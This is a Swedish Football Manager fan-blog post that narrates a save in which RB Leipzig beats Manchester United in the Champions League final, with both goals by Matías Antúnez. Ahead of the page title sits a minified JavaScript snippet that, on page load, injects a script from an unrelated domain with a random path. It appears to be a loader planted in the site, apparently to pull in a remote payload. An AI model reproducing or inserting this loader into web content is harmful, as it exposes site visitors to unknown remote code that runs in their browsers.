;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Champions League-finalen – FMSweden
Meny Stäng

Champions League-finalen

Då var det dags för den matchen som skulle sammanfatta hela Devran och Dannes klubblagskarriär. Det var vinna eller försvinna och det var mot Liverpool och Man Citys största rivaler… Manchester United. 

Matchen spelades på klassiska Santiago Bernabeu och givetvis kl 20.45 som CL alltid ska spelas.

Det blir en elva med Uruguay-stämpel, då hela fyra spelare i startelvan kommer från sydamerikanska världsmästarna.

Matchen startar med att Djorde Fratrovic skjuter stenhårt i stolpen efter tre minuter och RBL vittrade morgonluft direkt.

Genom saven har vi fått lära känna spelare som på ett eller annat sätt spelat en stor roll i Devrans karriär. Danne har hittat spelare i världens alla hörn och givetvis skulle en av dessa, kanske den spelaren som kommit oss allra närmast visa sig vara avgörande, när precis allt skulle avgöras.

Matías Antúnez har gjort underverk för Devran NH Bagis och när han gjorde 1-0 i finalen efter 23 minuter, så var inte ett öga torrt. Det blev inte mindre känslosamt när han sedan bombade in 2-0 i minut 58.

Dejan Nikolic i målet spikade igen. Morgan Pattison och Fernando Santiso såg till att United med all sin OP inte kom nånstans.

Matchen blåstes av exakt klockan 21.25, då hade Devran suttit och kollat på mer eller mindre hela matchen. Matchen med stort M.

RasenballSport Leipzig är Champions Leaguemästare.

I klubblagskarriärens sista match vann Devran och SportchefsDanne sin allra största seger.

Nu bär det av mot landslagskarriär, vilken världsdel och nation får ni veta nästa vecka.

Denna fredagen tillägnar vi Matías Antúnez och hans enorma betydelse i denna saven.

Trevlig helg vänner.

SKÅL

Tobbe

Please wait...

Liknande Inlägg

3 kommentarer

Lämna ett svar